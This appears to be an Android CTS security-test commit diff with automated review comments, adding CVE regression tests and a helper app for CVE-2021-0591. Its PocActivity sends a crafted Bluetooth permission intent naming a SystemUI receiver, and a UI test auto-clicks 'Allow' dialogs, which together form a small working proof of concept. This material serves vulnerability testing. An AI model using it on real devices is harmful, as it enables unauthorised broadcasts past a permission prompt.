+ @Test
+ public void testPocCVE_2018_9547() throws Exception {
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2018-9547", null, getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9564.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9564.java
new file mode 100644
index 00000000000..6e4d588205a
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9564.java
@@ -0,0 +1,38 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.AsbSecurityTest;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2018_9564 extends SecurityTestCase {
+
+ /**
+ * b/114238578
+ * Vulnerability Behaviour: SIGSEGV in self
+ */
+ @AsbSecurityTest(cveBugId = 114238578)
+ @Test
+ public void testPocCVE_2018_9564() throws Exception {
+ AdbUtils.assumeHasNfc(getDevice());
+ pocPusher.only64();
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2018-9564", null, getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9593.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9593.java
new file mode 100644
index 00000000000..e899b7ae9e9
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9593.java
@@ -0,0 +1,38 @@
+/**
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.AsbSecurityTest;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2018_9593 extends SecurityTestCase {
+
+ /**
+ * b/116722267
+ * Vulnerability Behaviour: SIGSEGV in self
+ */
+ @AsbSecurityTest(cveBugId = 116722267)
+ @Test
+ public void testPocCVE_2018_9593() throws Exception {
+ AdbUtils.assumeHasNfc(getDevice());
+ pocPusher.only64();
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2018-9593", null, getDevice());
+ }
+}
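Review bot: The licence header of this file opens with `/**`, which makes it a Javadoc comment, while CVE_2018_9547.java and CVE_2018_9564.java added in the same commit open theirs with a plain `/*`. The same applies to the new CVE_2018_9594.java and CVE_2021_0591.java. Changing the first line to `/*` keeps the licence text out of documentation tooling and makes the new test files consistent with each other.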
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9594.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9594.java
new file mode 100644
index 00000000000..d6e8fb59c0e
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9594.java
@@ -0,0 +1,38 @@
+/**
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.AsbSecurityTest;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2018_9594 extends SecurityTestCase {
+
+ /**
+ * b/116791157
+ * Vulnerability Behaviour: SIGSEGV in self
+ */
+ @AsbSecurityTest(cveBugId = 116791157)
+ @Test
+ public void testPocCVE_2018_9594() throws Exception {
+ AdbUtils.assumeHasNfc(getDevice());
+ pocPusher.only64();
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2018-9594", null, getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_29368.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_29368.java
index b0f19ada221..43a058c5543 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_29368.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_29368.java
@@ -23,7 +23,7 @@ import org.junit.runner.RunWith;
import static org.junit.Assert.*;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2021_29368 extends SecurityTestCase {
+public class CVE_2020_29368 extends SecurityTestCase {
/**
* b/174738029
@@ -31,7 +31,7 @@ public class CVE_2021_29368 extends SecurityTestCase {
*/
@AsbSecurityTest(cveBugId = 174738029)
@Test
- public void testPocCVE_2021_29368() throws Exception {
- AdbUtils.runPocAssertExitStatusNotVulnerable("CVE-2021-29368", getDevice(),60);
+ public void testPocCVE_2020_29368() throws Exception {
+ AdbUtils.runPocAssertExitStatusNotVulnerable("CVE-2020-29368", getDevice(),60);
}
}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0591.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0591.java
new file mode 100644
index 00000000000..0c8f0a9fd1b
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0591.java
@@ -0,0 +1,83 @@
+/**
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.AppModeFull;
+import android.platform.test.annotations.AsbSecurityTest;
+import android.platform.test.annotations.RequiresDevice;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import com.android.tradefed.testtype.junit4.BaseHostJUnit4Test;
+import java.util.regex.Pattern;
+import org.junit.Assert;
+import org.junit.Before;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import static org.hamcrest.core.Is.is;
+import static org.junit.Assert.assertThat;
+import static org.junit.Assume.assumeTrue;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2021_0591 extends BaseHostJUnit4Test {
+
+ private static final String TEST_PKG = "android.security.cts.CVE_2021_0591";
+ private static final String TEST_CLASS = TEST_PKG + "." + "DeviceTest";
+ private static final String TEST_APP = "CVE-2021-0591.apk";
+
+ @Before
+ public void setUp() throws Exception {
+ uninstallPackage(getDevice(), TEST_PKG);
+ }
+
+ /**
+ * b/179386960
+ */
+ @AppModeFull
+ @AsbSecurityTest(cveBugId = 179386960)
+ @Test
+ public void testPocCVE_2021_0591() throws Exception {
+ ITestDevice device = getDevice();
+
+ assumeTrue("Bluetooth is not available on device",
+ device.hasFeature("android.hardware.bluetooth"));
+
+ /* Clear the logs in the beginning */
+ AdbUtils.runCommandLine("logcat -c", device);
+ installPackage();
+ try {
+ runDeviceTests(TEST_PKG, TEST_CLASS, "testClick");
+ } catch (AssertionError error) {
+ /* runDeviceTests crashed, do not continue */
+ error.printStackTrace();
+ return;
+ }
+ String screenshotServiceErrorReceiver =
+ "com.android.systemui.screenshot.ScreenshotServiceErrorReceiver";
+ String logcat =
+ AdbUtils.runCommandLine("logcat -d BluetoothPermissionActivity *:S", device);
+ Pattern pattern = Pattern.compile(screenshotServiceErrorReceiver, Pattern.MULTILINE);
+ String message = "Device is vulnerable to b/179386960 "
+ + "hence it is possible to sent a broadcast intent to "
+ + screenshotServiceErrorReceiver;
+ assertThat(message, pattern.matcher(logcat).find(), is(false));
+ }
+
+ private void installPackage() throws Exception {
+ installPackage(TEST_APP, new String[0]);
+ }
+}
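Review bot: In `testPocCVE_2021_0591` the `catch (AssertionError error)` block prints the stack trace and returns, so any device-side failure (helper app not launching, confirmation button not found) is reported as a pass and cannot be told apart from a patched device. If that outcome is not meant to count as "not vulnerable", surface it as a skip instead, e.g. `assumeNoException("device-side test did not complete", error);` with `org.junit.Assume.assumeNoException` imported. The receiver class name is also compiled as a regex, so its dots match any character; `Pattern.compile(Pattern.quote(screenshotServiceErrorReceiver))` or a plain `logcat.contains(...)` states the intent exactly. The `org.junit.Assert` import is unused, and the failure message should read "possible to send".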
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0596.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0596.java
new file mode 100644
index 00000000000..0562b49b756
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0596.java
@@ -0,0 +1,38 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.AsbSecurityTest;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import org.junit.runner.RunWith;
+import org.junit.Test;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2021_0596 extends SecurityTestCase {
+
+ /**
+ * b/181346550
+ * Vulnerability Behaviour: SIGSEGV in self
+ */
+ @AsbSecurityTest(cveBugId = 181346550)
+ @Test
+ public void testPocCVE_2021_0596() throws Exception {
+ AdbUtils.assumeHasNfc(getDevice());
+ pocPusher.only64();
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2021-0596", null, getDevice());
+ }
+}
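Review bot: The Javadoc on `testPocCVE_2021_0596` gives only the bug id and the crash signal, and neither the `pocPusher.only64()` call nor the `null` second argument is explained. I would add a short comment on each, for example `// PoC binary is pushed for 64-bit only` and `// null: no command-line arguments for the PoC`; both wordings are inferred from the call shapes, since the helper signatures are not visible in this hunk, so confirm them against `AdbUtils` and `pocPusher`. The same applies to `CVE_2018_9594.java` earlier in this commit, which has the identical body. `org.junit.runner.RunWith` is also imported before `org.junit.Test` here, the reverse of the order used in that sibling file.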
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0591/Android.bp b/hostsidetests/securitybulletin/test-apps/CVE-2021-0591/Android.bp
new file mode 100644
index 00000000000..4afdb32662c
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0591/Android.bp
@@ -0,0 +1,35 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+android_test_helper_app {
+ name: "CVE-2021-0591",
+ defaults: [
+ "cts_support_defaults",
+ ],
+ srcs: ["src/**/*.java"],
+ test_suites: [
+ "cts",
+ "vts10",
+ "sts",
+ ],
+ static_libs: [
+ "androidx.test.core",
+ "androidx.test.rules",
+ "androidx.test.uiautomator_uiautomator",
+ ],
+ sdk_version: "current",
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0591/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2021-0591/AndroidManifest.xml
new file mode 100644
index 00000000000..8e33f0a8539
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0591/AndroidManifest.xml
@@ -0,0 +1,38 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2021 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ package="android.security.cts.CVE_2021_0591"
+ android:versionCode="1"
+ android:versionName="1.0">
+ <uses-permission android:name="android.permission.BLUETOOTH_ADMIN" />
+ <application
+ android:allowBackup="true"
+ android:label="CVE-2021-0591"
+ android:supportsRtl="true">
+
+ <activity android:name=".PocActivity" android:exported="true">
+ <intent-filter>
+ <action android:name="android.intent.action.MAIN" />
+ <category android:name="android.intent.category.LAUNCHER" />
+ </intent-filter>
+ </activity>
+ </application>
+
+ <instrumentation
+ android:name="androidx.test.runner.AndroidJUnitRunner"
+ android:targetPackage="android.security.cts.CVE_2021_0591" />
+</manifest>
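Review bot: `android:allowBackup="true"` on the `<application>` element is not needed for a helper app that exists only for one host-driven test run; `android:allowBackup="false"` keeps the package's data out of device backups and avoids the lint warning. The manifest also requests `BLUETOOTH_ADMIN` without saying which call needs it, so a one-line XML comment above the `<uses-permission>` line would tell a maintainer whether the permission can be dropped.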
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0591/res/layout/activity_main.xml b/hostsidetests/securitybulletin/test-apps/CVE-2021-0591/res/layout/activity_main.xml
new file mode 100644
index 00000000000..a85bec90a5a
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0591/res/layout/activity_main.xml
@@ -0,0 +1,26 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2021 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+<LinearLayout
+ xmlns:android="http://schemas.android.com/apk/res/android"
+ android:orientation="vertical"
+ android:layout_width="match_parent"
+ android:layout_height="match_parent">
+ <View
+ android:id="@+id/drawableview"
+ android:layout_width="match_parent"
+ android:layout_height="300dp" />
+</LinearLayout>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0591/src/android/security/cts/CVE_2021_0591/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/CVE-2021-0591/src/android/security/cts/CVE_2021_0591/DeviceTest.java
new file mode 100644
index 00000000000..0ca91d80d0f
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0591/src/android/security/cts/CVE_2021_0591/DeviceTest.java
@@ -0,0 +1,91 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2021_0591;
+
+import android.content.Context;
+import android.content.Intent;
+import android.content.pm.PackageManager;
+import android.os.SystemClock;
+import androidx.test.runner.AndroidJUnit4;
+import androidx.test.uiautomator.By;
+import androidx.test.uiautomator.BySelector;
+import androidx.test.uiautomator.UiDevice;
+import androidx.test.uiautomator.UiObject2;
+import androidx.test.uiautomator.Until;
+import java.util.List;
+import org.junit.Before;
+import org.junit.After;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import static androidx.test.core.app.ApplicationProvider.getApplicationContext;
+import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
+import static org.hamcrest.CoreMatchers.notNullValue;
+import static org.junit.Assert.assertThat;
+
+@RunWith(AndroidJUnit4.class)
+public class DeviceTest {
+
+ private static final String BASIC_SAMPLE_PACKAGE =
+ "android.security.cts.CVE_2021_0591";
+ private static final int LAUNCH_TIMEOUT_MS = 20000;
+ private UiDevice mDevice;
+
+ @Before
+ public void startMainActivityFromHomeScreen() {
+ mDevice = UiDevice.getInstance(getInstrumentation());
+ try {
+ mDevice.wakeUp();
+ mDevice.pressMenu();
+ mDevice.pressHome();
+ } catch (Exception e) {
+ e.printStackTrace();
+ }
+ Context context = getApplicationContext();
+ assertThat(context, notNullValue());
+ PackageManager packageManager = context.getPackageManager();
+ assertThat(packageManager, notNullValue());
+ final Intent intent = packageManager.getLaunchIntentForPackage(BASIC_SAMPLE_PACKAGE);
+ assertThat(intent, notNullValue());
+ intent.addFlags(Intent.FLAG_ACTIVITY_CLEAR_TASK);
+ context.startActivity(intent);
+ mDevice.wait(Until.hasObject(By.pkg(BASIC_SAMPLE_PACKAGE).depth(0)), LAUNCH_TIMEOUT_MS);
+ }
+
+ @After
+ public void lastOperation() {
+ SystemClock.sleep(20000);
+ }
+
+ @Test
+ public void testClick() {
+ List<UiObject2> objects;
+ BySelector selector = By.clickable(true);
+ String button;
+ objects = mDevice.findObjects(selector);
+ for (UiObject2 o : objects) {
+ button = o.getText();
+ if (button == null) {
+ continue;
+ }
+ if (button.matches("ALLOW|YES|Allow|Yes")) {
+ o.click();
+ return;
+ }
+ }
+ }
+}
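Review bot: `testClick` returns normally when no clickable object carries the text ALLOW/YES/Allow/Yes, so a run in which the dialog never appeared, appeared late, or was shown in another locale still passes, and the host-side logcat check then has nothing to find. `findObjects` samples the screen once, and the result of `mDevice.wait(...)` in `startMainActivityFromHomeScreen` is ignored. I would wait for the button and assert that it was found, as in the sketch below (it needs `java.util.regex.Pattern` imported); whether a missing button should fail or skip depends on what a patched device displays, which this hunk does not show. The unconditional `SystemClock.sleep(20000)` in `@After` would read better as a named constant with a comment on what it waits for.

```java
    @Test
    public void testClick() {
        // Wait for the confirmation button instead of sampling the screen once.
        UiObject2 confirm = mDevice.wait(
                Until.findObject(
                        By.clickable(true).text(Pattern.compile("ALLOW|YES|Allow|Yes"))),
                LAUNCH_TIMEOUT_MS);
        // A missing button means the dialog was never confirmed; report it instead of passing.
        assertThat("confirmation button not found", confirm, notNullValue());
        confirm.click();
    }
```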
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0591/src/android/security/cts/CVE_2021_0591/PocActivity.java b/hostsidetests/securitybulletin/test-apps/CVE-2021-0591/src/android/security/cts/CVE_2021_0591/PocActivity.java
new file mode 100644
index 00000000000..e1a12f944b4
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0591/src/android/security/cts/CVE_2021_0591/PocActivity.java
@@ -0,0 +1,45 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2021_0591;
+
+import android.app.Activity;
+import android.bluetooth.BluetoothAdapter;
+import android.bluetooth.BluetoothDevice;
+import android.content.Intent;
+import android.os.Bundle;
+
+import static org.junit.Assert.assertNotNull;
+
+public class PocActivity extends Activity {
+
+ @Override
+ protected void onCreate(Bundle savedInstanceState) {
+ super.onCreate(savedInstanceState);
+ setContentView(R.layout.activity_main);
+ Intent i = new Intent("android.bluetooth.device.action.CONNECTION_ACCESS_REQUEST");
+ i.setClassName("com.android.settings",
+ "com.android.settings.bluetooth.BluetoothPermissionActivity");
+ BluetoothAdapter bluetoothAdapter = BluetoothAdapter.getDefaultAdapter();
+ assertNotNull(bluetoothAdapter);
+ i.putExtra(BluetoothDevice.EXTRA_DEVICE,
+ bluetoothAdapter.getRemoteDevice("00:11:22:33:AA:BB"));
+ i.putExtra("android.bluetooth.device.extra.PACKAGE_NAME", "com.android.systemui");
+ i.putExtra("android.bluetooth.device.extra.CLASS_NAME",
+ "com.android.systemui.screenshot.ScreenshotServiceErrorReceiver");
+ startActivity(i);
+ }
+}
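Review bot: `onCreate` uses JUnit's `assertNotNull(bluetoothAdapter)` inside an `Activity`, where an `AssertionError` is not a test result but an uncaught exception that takes the app process down. A plain guard is clearer here: `if (bluetoothAdapter == null) { finish(); return; }`. The class also has no comment saying what it sets up; a short class-level Javadoc naming the bug id used by the host test (b/179386960) and stating that the activity exists only to be driven by `DeviceTest` would help the next maintainer.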
diff --git a/hostsidetests/statsdatom/src/android/cts/statsdatom/statsd/HostAtomTests.java b/hostsidetests/statsdatom/src/android/cts/statsdatom/statsd/HostAtomTests.java
index ad925131cf0..d9072497cbf 100644
--- a/hostsidetests/statsdatom/src/android/cts/statsdatom/statsd/HostAtomTests.java
+++ b/hostsidetests/statsdatom/src/android/cts/statsdatom/statsd/HostAtomTests.java
@@ -229,14 +229,19 @@ public class HostAtomTests extends DeviceTestCase implements IBuildReceiver {
// Trigger events in same order.
DeviceUtils.plugInAc(getDevice());
+ DeviceUtils.flushBatteryStatsHandlers(getDevice());
Thread.sleep(AtomTestUtils.WAIT_TIME_LONG);
DeviceUtils.unplugDevice(getDevice());
+ DeviceUtils.flushBatteryStatsHandlers(getDevice());
Thread.sleep(AtomTestUtils.WAIT_TIME_LONG);
plugInUsb();
+ DeviceUtils.flushBatteryStatsHandlers(getDevice());
Thread.sleep(AtomTestUtils.WAIT_TIME_LONG);
DeviceUtils.unplugDevice(getDevice());
+ DeviceUtils.flushBatteryStatsHandlers(getDevice());
Thread.sleep(AtomTestUtils.WAIT_TIME_LONG);
plugInWireless();
+ DeviceUtils.flushBatteryStatsHandlers(getDevice());
Thread.sleep(AtomTestUtils.WAIT_TIME_LONG);
DeviceUtils.unplugDevice(getDevice());
DeviceUtils.flushBatteryStatsHandlers(getDevice());
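Review bot: The added `DeviceUtils.flushBatteryStatsHandlers(getDevice())` calls repeat the same flush-then-sleep pair after every plug and unplug step in this sequence. A small private helper, for example `private void flushAndWait() throws Exception`, called after each state change would keep the event order readable and make it harder to add a new step without the flush. A one-line comment on why the flush has to precede the sleep would also help. The enclosing test method starts and ends outside this hunk.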
diff --git a/tests/location/location_fine/src/android/location/cts/fine/LocationManagerFineTest.java b/tests/location/location_fine/src/android/location/cts/fine/LocationManagerFineTest.java
index dcaee4fb7bf..1be37c3df22 100644
--- a/tests/location/location_fine/src/android/location/cts/fine/LocationManagerFineTest.java
+++ b/tests/location/location_fine/src/android/location/cts/fine/LocationManagerFineTest.java
@@ -18,6 +18,7 @@ package android.location.cts.fine;
import static android.Manifest.permission.WRITE_SECURE_SETTINGS;
import static android.content.pm.PackageManager.FEATURE_AUTOMOTIVE;
+import static android.content.pm.PackageManager.FEATURE_TELEVISION;
import static android.location.LocationManager.EXTRA_PROVIDER_ENABLED;
import static android.location.LocationManager.EXTRA_PROVIDER_NAME;
import static android.location.LocationManager.FUSED_PROVIDER;
@@ -264,8 +265,6 @@ public class LocationManagerFineTest {
@Test
public void testGetCurrentLocation_Timeout() throws Exception {
- Location loc = createLocation(TEST_PROVIDER, mRandom);
-
try (GetCurrentLocationCapture capture = new GetCurrentLocationCapture()) {
mManager.getCurrentLocation(
TEST_PROVIDER,
@@ -665,8 +664,9 @@ public class LocationManagerFineTest {
@Test
public void testRequestLocationUpdates_BatterySaver_GpsDisabledScreenOff() throws Exception {
- // battery saver is unsupported on auto
+ // battery saver is unsupported on auto and tv
assumeFalse(mContext.getPackageManager().hasSystemFeature(FEATURE_AUTOMOTIVE));
+ assumeFalse(mContext.getPackageManager().hasSystemFeature(FEATURE_TELEVISION));
PowerManager powerManager = Objects.requireNonNull(
mContext.getSystemService(PowerManager.class));
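Review bot: The two `assumeFalse(mContext.getPackageManager().hasSystemFeature(...))` lines and their comment are now repeated verbatim in `testRequestLocationUpdates_BatterySaver_GpsDisabledScreenOff`, `..._AllDisabledScreenOff` and `..._ThrottleScreenOff` (this hunk and the next two). I would move them into one helper, for instance `private void assumeBatterySaverSupported()`, so the next unsupported form factor is added in a single place. Each test body continues outside its hunk.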
@@ -725,8 +725,9 @@ public class LocationManagerFineTest {
@Test
public void testRequestLocationUpdates_BatterySaver_AllDisabledScreenOff() throws Exception {
- // battery saver is unsupported on auto
+ // battery saver is unsupported on auto and tv
assumeFalse(mContext.getPackageManager().hasSystemFeature(FEATURE_AUTOMOTIVE));
+ assumeFalse(mContext.getPackageManager().hasSystemFeature(FEATURE_TELEVISION));
PowerManager powerManager = Objects.requireNonNull(
mContext.getSystemService(PowerManager.class));
@@ -766,8 +767,9 @@ public class LocationManagerFineTest {
@Test
public void testRequestLocationUpdates_BatterySaver_ThrottleScreenOff() throws Exception {
- // battery saver is unsupported on auto
+ // battery saver is unsupported on auto and tv
assumeFalse(mContext.getPackageManager().hasSystemFeature(FEATURE_AUTOMOTIVE));
+ assumeFalse(mContext.getPackageManager().hasSystemFeature(FEATURE_TELEVISION));
PowerManager powerManager = Objects.requireNonNull(
mContext.getSystemService(PowerManager.class));
@@ -1007,7 +1009,7 @@ public class LocationManagerFineTest {
@Test
public void testRequestFlush_Gnss() throws Exception {
- assumeTrue(mManager.getAllProviders().contains(GPS_PROVIDER));
+ assumeTrue(mManager.hasProvider(GPS_PROVIDER));
try (LocationListenerCapture capture = new LocationListenerCapture(mContext)) {
mManager.requestLocationUpdates(GPS_PROVIDER, 0, 0,
diff --git a/tests/tests/os/src/android/os/cts/CompanionDeviceManagerTest.kt b/tests/tests/os/src/android/os/cts/CompanionDeviceManagerTest.kt
index bfb82c5a3e1..6869889e68b 100644
--- a/tests/tests/os/src/android/os/cts/CompanionDeviceManagerTest.kt
+++ b/tests/tests/os/src/android/os/cts/CompanionDeviceManagerTest.kt
@@ -17,6 +17,7 @@
package android.os.cts
import android.companion.CompanionDeviceManager
+import android.content.pm.PackageManager
import android.content.pm.PackageManager.FEATURE_AUTOMOTIVE
import android.content.pm.PackageManager.FEATURE_COMPANION_DEVICE_SETUP
import android.content.pm.PackageManager.PERMISSION_GRANTED
@@ -68,6 +69,8 @@ const val COMPANION_APPROVE_WIFI_CONNECTIONS =
const val DUMMY_MAC_ADDRESS = "00:00:00:00:00:10"
const val MANAGE_COMPANION_DEVICES = "android.permission.MANAGE_COMPANION_DEVICES"
const val SHELL_PACKAGE_NAME = "com.android.shell"
+const val TEST_APP_PACKAGE_NAME = "android.os.cts.companiontestapp"
+const val TEST_APP_APK_LOCATION = "/data/local/tmp/cts/os/CtsCompanionTestApp.apk"
val InstrumentationTestCase.context get() = InstrumentationRegistry.getTargetContext()
/**
@@ -79,6 +82,11 @@ class CompanionDeviceManagerTest : InstrumentationTestCase() {
val cdm: CompanionDeviceManager by lazy {
context.getSystemService(CompanionDeviceManager::class.java)
}
+ val pm: PackageManager by lazy { context.packageManager }
+ private val hasFeatureCompanionDeviceSetup: Boolean by lazy {
+ pm.hasSystemFeature(FEATURE_COMPANION_DEVICE_SETUP)
+ }
+ private val isAuto: Boolean by lazy { pm.hasSystemFeature(FEATURE_AUTOMOTIVE) }
private fun isShellAssociated(macAddress: String, packageName: String): Boolean {
val userId = context.userId
@@ -102,19 +110,24 @@ class CompanionDeviceManagerTest : InstrumentationTestCase() {
@Before
fun assumeHasFeature() {
- assumeTrue(context.packageManager.hasSystemFeature(FEATURE_COMPANION_DEVICE_SETUP))
+ assumeTrue(hasFeatureCompanionDeviceSetup)
// TODO(b/191699828) test does not work in automotive due to accessibility issue
- assumeFalse(context.packageManager.hasSystemFeature(FEATURE_AUTOMOTIVE))
+ assumeFalse(isAuto)
}
@After
fun removeAllAssociations() {
- val packageName = "android.os.cts.companiontestapp"
+ // If the devices does not have the feature or is an Auto, the test didn't run, and the
+ // clean up is not needed (will actually crash if the feature is missing).
+ // See assumeHasFeature @Before method.
+ if (!hasFeatureCompanionDeviceSetup || isAuto) return
+
val userId = context.userId
- val associations = getAssociatedDevices(packageName)
+ val associations = getAssociatedDevices(TEST_APP_PACKAGE_NAME)
for (address in associations) {
